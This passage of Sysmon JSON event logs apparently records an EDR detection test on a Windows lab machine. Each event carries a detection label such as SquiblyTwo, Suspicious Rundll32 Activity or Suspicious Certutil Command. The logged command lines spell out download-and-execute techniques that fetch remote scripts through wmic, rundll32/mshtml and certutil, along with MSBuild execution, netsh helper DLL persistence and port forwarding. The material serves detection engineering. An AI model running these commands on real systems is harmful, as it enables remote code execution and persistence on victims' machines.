(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-663D-5D3F-0000-00106F608A00","ProcessId":3240,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:49.535"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4936,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:49.748805Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\MSBuild.exe xxxFile.csproj","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"MSBuild.exe","FileVersion":"4.7.3190.0 built by: 
NET472REL1LAST_C","Hashes":"SHA1=9672CADE96C657A8860D60923AFDBE4C46A2935D,MD5=4D7D4D92DC7D86B72ABF81821FF83837,SHA256=B60EB62F6C24D4A495A0DAB95CC49624AC5099A2CC21F8BD010A410401AB8CC3,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\MSBuild.exe xxxFile.csproj","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-663D-5D3F-0000-00106F608A00","ParentProcessId":3240,"ProcessGuid":"747F3D96-663D-5D3F-0000-001062708A00","ProcessId":5340,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:49.881"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4938,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:50.104868Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing","SquiblyTwo"],"event":{"Event":{"EventData":{"CommandLine":"wmic process get brief /format:\"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Commandline Utility","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c wmic process get brief /format:\"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6641-5D3F-0000-0010A38C8A00","ParentProcessId":4260,"ProcessGuid":"747F3D96-6642-5D3F-0000-0010F69D8A00","ProcessId":4896,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:54.044"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4941,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:54.246154Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-07-29 
21:33:54.618","Image":"C:\\Windows\\System32\\Wbem\\WMIC.exe","ProcessGuid":"747F3D96-6642-5D3F-0000-0010F69D8A00","ProcessId":4896,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\LQ86GWLO\\Wmic_calc[1].xsl","UtcTime":"2019-07-29 21:33:54.618"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":4942,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:54.630548Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Capture a Network Trace with netsh.exe"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6646-5D3F-0000-0010E32E8B00","ProcessId":5084,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:58.245"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4945,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:58.256845Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Capture a Network Trace with netsh.exe"],"event":{"Event":{"EventData":{"CommandLine":"netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-0010E32E8B00","ParentProcessId":5084,"ProcessGuid":"747F3D96-6647-5D3F-0000-0010AE6E8B00","ProcessId":5056,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:59.141"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4952,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:00.420234Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Netsh Port Forwarding"],"event":{"Event":{"EventData":{"CommandLine":"netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-0010A7398B00","ParentProcessId":3868,"ProcessGuid":"747F3D96-6647-5D3F-0000-001065758B00","ProcessId":5048,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:59.368"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4954,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:00.442242Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Netsh Port Forwarding"],"event":{"Event":{"EventData":{"CommandLine":"netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-001029398B00","ParentProcessId":6760,"ProcessGuid":"747F3D96-6647-5D3F-0000-001057768B00","ProcessId":4028,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:59.390"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4955,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:00.460197Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Netsh DLL Persistence"],"event":{"Event":{"EventData":{"CommandLine":"netsh.exe add helper AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh.exe add helper AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-001051388B00","ParentProcessId":3824,"ProcessGuid":"747F3D96-6647-5D3F-0000-0010927C8B00","ProcessId":5236,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:59.544"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4956,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:00.466817Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"192.168.1.1/8000","EventType":"SetValue","Image":"C:\\Windows\\system32\\netsh.exe","ProcessGuid":"747F3D96-6647-5D3F-0000-001057768B00","ProcessId":4028,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\PortProxy\\v4tov4\\tcp\\0.0.0.0/8080","UtcTime":"2019-07-29 21:33:59.803"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4957,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:00.707406Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-DCFC-5D3F-0000-0010F1520000","ProcessId":568,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\NdisCap\\Start","UtcTime":"2019-07-29 
21:34:00.367"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4962,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:01.057426Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-DCFC-5D3F-0000-0010F1520000","ProcessId":568,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\NdisCap\\Start","UtcTime":"2019-07-29 21:34:00.678"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4964,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:01.660499Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test\")","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6652-5D3F-0000-0010B9708C00","ProcessId":5844,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:10.292"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4969,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:10.373481Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test\")","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test\")","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6652-5D3F-0000-0010B9708C00","ParentProcessId":5844,"ProcessGuid":"747F3D96-6652-5D3F-0000-001058828C00","ProcessId":348,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:10.619"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4971,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:10.708142Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new0ActiveXObject(\"WScript.Shell\").run(\"calc.exe\",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe && exit\",0,true);}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows 
Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6657-5D3F-0000-001029198D00","ProcessId":1808,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:15.202"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4975,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:15.226408Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new0ActiveXObject(\"WScript.Shell\").run(\"calc.exe\",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe && exit\",0,true);}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new0ActiveXObject(\"WScript.Shell\").run(\"calc.exe\",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe && exit\",0,true);}","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6657-5D3F-0000-001029198D00","ParentProcessId":1808,"ProcessGuid":"747F3D96-6657-5D3F-0000-001011298D00","ProcessId":1004,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:15.502"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4977,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:15.658168Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command 
Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-665C-5D3F-0000-0010096B8D00","ProcessId":7088,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 